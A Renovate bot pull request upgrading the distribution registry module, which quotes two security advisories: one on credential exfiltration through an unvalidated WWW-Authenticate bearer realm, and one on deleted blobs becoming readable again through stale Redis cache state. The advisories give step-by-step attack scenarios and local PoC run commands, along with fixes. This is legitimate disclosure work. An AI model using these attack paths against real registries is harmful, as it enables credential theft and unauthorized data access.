Skip to content

Renovate: Update module github.com/distribution/distribution/v3 to v3.1.0 [SECURITY]#12

Open
renovate[bot] wants to merge 1 commit intomasterfrom
renovate/go-github.com-distribution-distribution-v3-vulnerability
Open

Renovate: Update module github.com/distribution/distribution/v3 to v3.1.0 [SECURITY]#12
renovate[bot] wants to merge 1 commit intomasterfrom
renovate/go-github.com-distribution-distribution-v3-vulnerability

Conversation

@renovate
Copy link
Copy Markdown

@renovate renovate bot commented Apr 7, 2026

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
github.com/distribution/distribution/v3 v3.0.0v3.1.0 age adoption passing confidence

GitHub Vulnerability Alerts

CVE-2026-33540

hi guys,

commit: 40594bd98e6d6ed993b5c6021c93fdf96d2e5851 (as-of 2026-01-31)
contact: GitHub Security Advisory (https://github.com/distribution/distribution/security/advisories/new)

summary

in pull-through cache mode, distribution discovers token auth endpoints by parsing WWW-Authenticate challenges returned by the configured upstream registry. the realm URL from a bearer challenge is used without validating that it matches the upstream registry host. as a result, an attacker-controlled upstream (or an attacker with MitM position to the upstream) can cause distribution to send the configured upstream credentials via basic auth to an attacker-controlled realm URL.

this is the same vulnerability class as CVE-2020-15157 (containerd), but in distribution’s pull-through cache proxy auth flow.

severity

HIGH

note: the baseline impact is credential disclosure of the configured upstream credentials. if a deployment uses broader credentials for upstream auth (for example cloud iam credentials), the downstream impact can be higher; i am not claiming this as default for all deployments.

impact

credential exfiltration of the upstream authentication material configured for the pull-through cache.

attacker starting positions that make this realistic:

  • supply chain / configuration: an operator configures a proxy cache to use an upstream that becomes attacker-controlled (compromised registry, stale domain, or a malicious mirror)
  • network: MitM on the upstream connection in environments where the upstream is reachable over insecure transport or a compromised network path

affected components

  • registry/proxy/proxyauth.go:66-81 (getAuthURLs): extracts bearer realm from upstream WWW-Authenticate without validating destination
  • internal/client/auth/session.go:485-510 (fetchToken): uses the realm URL directly for token fetch
  • internal/client/auth/session.go:429-434 (fetchTokenWithBasicAuth): sends credentials via basic auth to the realm URL

reproduction

attachment: poc.zip (local harness) with canonical and control runs.

the harness is local and does not contact a real registry: it uses two local HTTP servers (upstream + attacker token service) to demonstrate whether basic auth is sent to an attacker-chosen realm.

unzip -q -o poc.zip -d poc
cd poc
make canonical
make control

expected output (excerpt):

[CALLSITE_HIT]: getAuthURLs::configureAuth
[PROOF_MARKER]: basic_auth_sent=true realm_host=127.0.0.1 account_param=user authorization_prefix=Basic

control output (excerpt):

[CALLSITE_HIT]: getAuthURLs::configureAuth
[NC_MARKER]: realm_validation=PASS basic_auth_sent=false

suggested remediation

validate that the token realm destination is within the intended trust boundary before associating credentials with it or sending any authentication to it. one conservative option is strict same-host binding: only accept a realm whose host matches the configured upstream host.

fix accepted when

  • distribution does not send configured upstream credentials to an attacker-chosen realm URL
  • a regression test covers the canonical and blocked cases

addendum.md
poc.zip
PR_DESCRIPTION.md
RUNNABLE_POC.md

best,
oleh

CVE-2026-35172

summary:

distribution can restore read access in repo a after an explicit delete when storage.cache.blobdescriptor: redis and storage.delete.enabled: true are both enabled. the delete path clears the shared digest descriptor but leaves stale repo-scoped membership behind, so a later Stat or Get from repo b repopulates the shared descriptor and makes the deleted blob readable from repo a again.

Severity

HIGH

justification: this is a repo-local authorization bypass after explicit delete, with concrete confidentiality impact and no requirement for write access after the delete event. CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N (7.5). CWE-284.

affected version

details

the backend access model is repository-link based: once repo a deletes its blob link, later reads from repo a should continue returning ErrBlobUnknown even if the same digest remains linked in repo b.

the issue is the split invalidation path in the redis cache backend:

  1. linkedBlobStore.Delete calls blobAccessController.Clear during repository delete handling.
  2. cachedBlobStatter.Clear forwards that invalidation into the cache layer.
  3. repositoryScopedRedisBlobDescriptorService.Clear checks that the digest is a member of repo a, but then only calls upstream.Clear.
  4. upstream.Clear deletes the shared digest descriptor and does not remove the digest from the repository membership set for repo a.
  5. when repo b later stats or gets the same digest, the shared descriptor is recreated.
  6. repositoryScopedRedisBlobDescriptorService.Stat for repo a accepts the stale membership and now trusts the repopulated shared descriptor, restoring access in the repository that already deleted its link.

this creates a revocation gap at the repository boundary. the blob is briefly inaccessible from repo a right after delete, which confirms the backend link was removed, and then becomes accessible again only because stale redis membership survived while a peer repository repopulated the shared descriptor.

attack scenario

  1. an operator runs distribution with storage.cache.blobdescriptor: redis and storage.delete.enabled: true.
  2. the same digest exists in both repo a and repo b.
  3. the operator deletes the blob from repo a and expects repository-local access to be revoked.
  4. repo a correctly returns blob unknown immediately after the delete.
  5. an anonymous or unprivileged user requests the same digest from repo b, which still legitimately owns it and repopulates the shared descriptor.
  6. a later request for the digest from repo a succeeds again because stale repo-a membership was never revoked from redis.

PoC

attachment: poc.zip

the attached PoC is a deterministic integration harness using miniredis and the pinned distribution source tree.

steps to reproduce

canonical:

unzip -q -o poc.zip -d poc
cd poc
make canonical

expected output:

[CALLSITE_HIT]: repositoryScopedRedisBlobDescriptorService.Clear->upstream.Clear->repositoryScopedRedisBlobDescriptorService.Stat
[PROOF_MARKER]: repo_a_access_restored=true repo_a_delete_miss=true repo_b_peer_warm=true
[IMPACT_MARKER]: repo_a_post_delete_read=true confidentiality_boundary_broken=true

control:

unzip -q -o poc.zip -d poc
cd poc
make control

expected control output:

[CALLSITE_HIT]: repositoryScopedRedisBlobDescriptorService.Clear->repositoryScopedRedisBlobDescriptorService.Stat
[NC_MARKER]: repo_a_access_restored=false repo_b_peer_warm=true

expected vs actual

  • expected: after repo a deletes its blob link, later reads from repo a should keep returning blob unknown even if repo b still references the same digest and warms cache state.
  • actual: repo a first returns blob unknown, then repo b repopulates the shared descriptor, and repo a serves the deleted digest again through stale repo-scoped redis membership.

impact

the confirmed impact is repository-local confidentiality failure after explicit delete. an operator can remove sensitive content from repo a, observe revocation working immediately after the delete, and still have the same content become readable from repo a again as soon as repo b refreshes the shared descriptor for that digest.

this is not a claim about global blob deletion. the bounded claim is that repository-local revocation fails, which breaks the expectation that deleting a blob link from one repository prevents further reads from that repository.

remediation

the safest fix is to make redis invalidation revoke repo-scoped state together with the backend link deletion. in practice that means removing the digest from the repository membership set, deleting the repo-scoped descriptor hash, and keeping that cleanup atomic enough that peer-repository warming cannot restore access in the repository that already deleted its link.

poc.zip
PR_DESCRIPTION.md
attack_scenario.md


Distribution affected by pull-through cache credential exfiltration via www-authenticate bearer realm

CVE-2026-33540 / GHSA-3p65-76g6-3w7r

More information

Details

hi guys,

commit: 40594bd98e6d6ed993b5c6021c93fdf96d2e5851 (as-of 2026-01-31)
contact: GitHub Security Advisory (https://github.com/distribution/distribution/security/advisories/new)

summary

in pull-through cache mode, distribution discovers token auth endpoints by parsing WWW-Authenticate challenges returned by the configured upstream registry. the realm URL from a bearer challenge is used without validating that it matches the upstream registry host. as a result, an attacker-controlled upstream (or an attacker with MitM position to the upstream) can cause distribution to send the configured upstream credentials via basic auth to an attacker-controlled realm URL.

this is the same vulnerability class as CVE-2020-15157 (containerd), but in distribution’s pull-through cache proxy auth flow.

severity

HIGH

note: the baseline impact is credential disclosure of the configured upstream credentials. if a deployment uses broader credentials for upstream auth (for example cloud iam credentials), the downstream impact can be higher; i am not claiming this as default for all deployments.

impact

credential exfiltration of the upstream authentication material configured for the pull-through cache.

attacker starting positions that make this realistic:

  • supply chain / configuration: an operator configures a proxy cache to use an upstream that becomes attacker-controlled (compromised registry, stale domain, or a malicious mirror)
  • network: MitM on the upstream connection in environments where the upstream is reachable over insecure transport or a compromised network path
affected components
  • registry/proxy/proxyauth.go:66-81 (getAuthURLs): extracts bearer realm from upstream WWW-Authenticate without validating destination
  • internal/client/auth/session.go:485-510 (fetchToken): uses the realm URL directly for token fetch
  • internal/client/auth/session.go:429-434 (fetchTokenWithBasicAuth): sends credentials via basic auth to the realm URL
reproduction

attachment: poc.zip (local harness) with canonical and control runs.

the harness is local and does not contact a real registry: it uses two local HTTP servers (upstream + attacker token service) to demonstrate whether basic auth is sent to an attacker-chosen realm.

unzip -q -o poc.zip -d poc
cd poc
make canonical
make control

expected output (excerpt):

[CALLSITE_HIT]: getAuthURLs::configureAuth
[PROOF_MARKER]: basic_auth_sent=true realm_host=127.0.0.1 account_param=user authorization_prefix=Basic

control output (excerpt):

[CALLSITE_HIT]: getAuthURLs::configureAuth
[NC_MARKER]: realm_validation=PASS basic_auth_sent=false
suggested remediation

validate that the token realm destination is within the intended trust boundary before associating credentials with it or sending any authentication to it. one conservative option is strict same-host binding: only accept a realm whose host matches the configured upstream host.

fix accepted when
  • distribution does not send configured upstream credentials to an attacker-chosen realm URL
  • a regression test covers the canonical and blocked cases

addendum.md
poc.zip
PR_DESCRIPTION.md
RUNNABLE_POC.md

best,
oleh

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


Distribution: stale blob access resurrection via repo-scoped redis descriptor cache invalidation

CVE-2026-35172 / GHSA-f2g3-hh2r-cwgc

More information

Details

summary:

distribution can restore read access in repo a after an explicit delete when storage.cache.blobdescriptor: redis and storage.delete.enabled: true are both enabled. the delete path clears the shared digest descriptor but leaves stale repo-scoped membership behind, so a later Stat or Get from repo b repopulates the shared descriptor and makes the deleted blob readable from repo a again.

Severity

HIGH

justification: this is a repo-local authorization bypass after explicit delete, with concrete confidentiality impact and no requirement for write access after the delete event. CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N (7.5). CWE-284.

affected version
details

the backend access model is repository-link based: once repo a deletes its blob link, later reads from repo a should continue returning ErrBlobUnknown even if the same digest remains linked in repo b.

the issue is the split invalidation path in the redis cache backend:

  1. linkedBlobStore.Delete calls blobAccessController.Clear during repository delete handling.
  2. cachedBlobStatter.Clear forwards that invalidation into the cache layer.
  3. repositoryScopedRedisBlobDescriptorService.Clear checks that the digest is a member of repo a, but then only calls upstream.Clear.
  4. upstream.Clear deletes the shared digest descriptor and does not remove the digest from the repository membership set for repo a.
  5. when repo b later stats or gets the same digest, the shared descriptor is recreated.
  6. repositoryScopedRedisBlobDescriptorService.Stat for repo a accepts the stale membership and now trusts the repopulated shared descriptor, restoring access in the repository that already deleted its link.

this creates a revocation gap at the repository boundary. the blob is briefly inaccessible from repo a right after delete, which confirms the backend link was removed, and then becomes accessible again only because stale redis membership survived while a peer repository repopulated the shared descriptor.

attack scenario
  1. an operator runs distribution with storage.cache.blobdescriptor: redis and storage.delete.enabled: true.
  2. the same digest exists in both repo a and repo b.
  3. the operator deletes the blob from repo a and expects repository-local access to be revoked.
  4. repo a correctly returns blob unknown immediately after the delete.
  5. an anonymous or unprivileged user requests the same digest from repo b, which still legitimately owns it and repopulates the shared descriptor.
  6. a later request for the digest from repo a succeeds again because stale repo-a membership was never revoked from redis.
PoC

attachment: poc.zip

the attached PoC is a deterministic integration harness using miniredis and the pinned distribution source tree.

steps to reproduce

canonical:

unzip -q -o poc.zip -d poc
cd poc
make canonical

expected output:

[CALLSITE_HIT]: repositoryScopedRedisBlobDescriptorService.Clear->upstream.Clear->repositoryScopedRedisBlobDescriptorService.Stat
[PROOF_MARKER]: repo_a_access_restored=true repo_a_delete_miss=true repo_b_peer_warm=true
[IMPACT_MARKER]: repo_a_post_delete_read=true confidentiality_boundary_broken=true

control:

unzip -q -o poc.zip -d poc
cd poc
make control

expected control output:

[CALLSITE_HIT]: repositoryScopedRedisBlobDescriptorService.Clear->repositoryScopedRedisBlobDescriptorService.Stat
[NC_MARKER]: repo_a_access_restored=false repo_b_peer_warm=true
expected vs actual
  • expected: after repo a deletes its blob link, later reads from repo a should keep returning blob unknown even if repo b still references the same digest and warms cache state.
  • actual: repo a first returns blob unknown, then repo b repopulates the shared descriptor, and repo a serves the deleted digest again through stale repo-scoped redis membership.
impact

the confirmed impact is repository-local confidentiality failure after explicit delete. an operator can remove sensitive content from repo a, observe revocation working immediately after the delete, and still have the same content become readable from repo a again as soon as repo b refreshes the shared descriptor for that digest.

this is not a claim about global blob deletion. the bounded claim is that repository-local revocation fails, which breaks the expectation that deleting a blob link from one repository prevents further reads from that repository.

remediation

the safest fix is to make redis invalidation revoke repo-scoped state together with the backend link deletion. in practice that means removing the digest from the repository membership set, deleting the repo-scoped descriptor hash, and keeping that cleanup atomic enough that peer-repository warming cannot restore access in the repository that already deleted its link.

poc.zip
PR_DESCRIPTION.md
attack_scenario.md

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


Release Notes

distribution/distribution (github.com/distribution/distribution/v3)

v3.1.0

Compare Source

Welcome to the v3.1.0 release of registry!

This is a stable release

Please try out the release binaries and report any issues at
https://github.com/distribution/distribution/issues.

Notable Changes

See the full changelog below for the full list of changes.

What's Changed

New Contributors

Full Changelog: distribution/distribution@v3.0.0...v3.1.0


Configuration

📅 Schedule: (UTC)

  • Branch creation
    • ""
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate
Copy link
Copy Markdown
Author

renovate bot commented Apr 7, 2026

ℹ️ Artifact update notice

File name: go.mod

In order to perform the update(s) described in the table above, Renovate ran the go get command, which resulted in the following additional change(s):

  • 45 additional dependencies were updated

Details:

Package Change
golang.org/x/sync v0.18.0 -> v0.19.0
github.com/bshuster-repo/logrus-logstash-hook v1.0.0 -> v1.1.0
github.com/docker/docker-credential-helpers v0.8.2 -> v0.9.5
github.com/docker/go-events v0.0.0-20190806004212-e31b211e4f1c -> v0.0.0-20250808211157-605354379745
github.com/grpc-ecosystem/grpc-gateway/v2 v2.27.2 -> v2.28.0
github.com/klauspost/compress v1.18.1 -> v1.18.4
github.com/prometheus/common v0.67.4 -> v0.67.5
github.com/prometheus/otlptranslator v0.0.2 -> v1.0.0
github.com/prometheus/procfs v0.17.0 -> v0.20.1
github.com/sirupsen/logrus v1.9.3 -> v1.9.4
github.com/spf13/cobra v1.10.1 -> v1.10.2
go.opentelemetry.io/contrib/bridges/prometheus v0.57.0 -> v0.67.0
go.opentelemetry.io/contrib/exporters/autoexport v0.57.0 -> v0.67.0
go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp v0.62.0 -> v0.67.0
go.opentelemetry.io/otel v1.38.0 -> v1.42.0
go.opentelemetry.io/otel/exporters/otlp/otlplog/otlploggrpc v0.14.0 -> v0.18.0
go.opentelemetry.io/otel/exporters/otlp/otlplog/otlploghttp v0.14.0 -> v0.18.0
go.opentelemetry.io/otel/exporters/otlp/otlpmetric/otlpmetricgrpc v1.38.0 -> v1.42.0
go.opentelemetry.io/otel/exporters/otlp/otlpmetric/otlpmetrichttp v1.38.0 -> v1.42.0
go.opentelemetry.io/otel/exporters/otlp/otlptrace v1.38.0 -> v1.42.0
go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracegrpc v1.38.0 -> v1.42.0
go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracehttp v1.38.0 -> v1.42.0
go.opentelemetry.io/otel/exporters/prometheus v0.60.0 -> v0.64.0
go.opentelemetry.io/otel/exporters/stdout/stdoutlog v0.14.0 -> v0.18.0
go.opentelemetry.io/otel/exporters/stdout/stdoutmetric v1.38.0 -> v1.42.0
go.opentelemetry.io/otel/exporters/stdout/stdouttrace v1.38.0 -> v1.42.0
go.opentelemetry.io/otel/log v0.14.0 -> v0.18.0
go.opentelemetry.io/otel/metric v1.38.0 -> v1.42.0
go.opentelemetry.io/otel/sdk v1.38.0 -> v1.42.0
go.opentelemetry.io/otel/sdk/log v0.14.0 -> v0.18.0
go.opentelemetry.io/otel/sdk/metric v1.38.0 -> v1.42.0
go.opentelemetry.io/otel/trace v1.38.0 -> v1.42.0
go.opentelemetry.io/proto/otlp v1.7.1 -> v1.9.0
golang.org/x/crypto v0.45.0 -> v0.48.0
golang.org/x/mod v0.30.0 -> v0.32.0
golang.org/x/net v0.47.0 -> v0.51.0
golang.org/x/oauth2 v0.32.0 -> v0.35.0
golang.org/x/sys v0.38.0 -> v0.41.0
golang.org/x/term v0.37.0 -> v0.40.0
golang.org/x/text v0.31.0 -> v0.34.0
golang.org/x/tools v0.39.0 -> v0.41.0
google.golang.org/genproto/googleapis/api v0.0.0-20250825161204-c5933d9347a5 -> v0.0.0-20260226221140-a57be14db171
google.golang.org/genproto/googleapis/rpc v0.0.0-20251022142026-3a174f9686a8 -> v0.0.0-20260226221140-a57be14db171
google.golang.org/grpc v1.76.0 -> v1.79.3
google.golang.org/protobuf v1.36.10 -> v1.36.11

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant